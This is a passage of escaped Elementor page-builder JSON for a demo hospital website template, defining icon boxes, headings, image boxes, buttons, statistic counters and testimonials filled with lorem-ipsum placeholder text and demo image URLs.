sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet 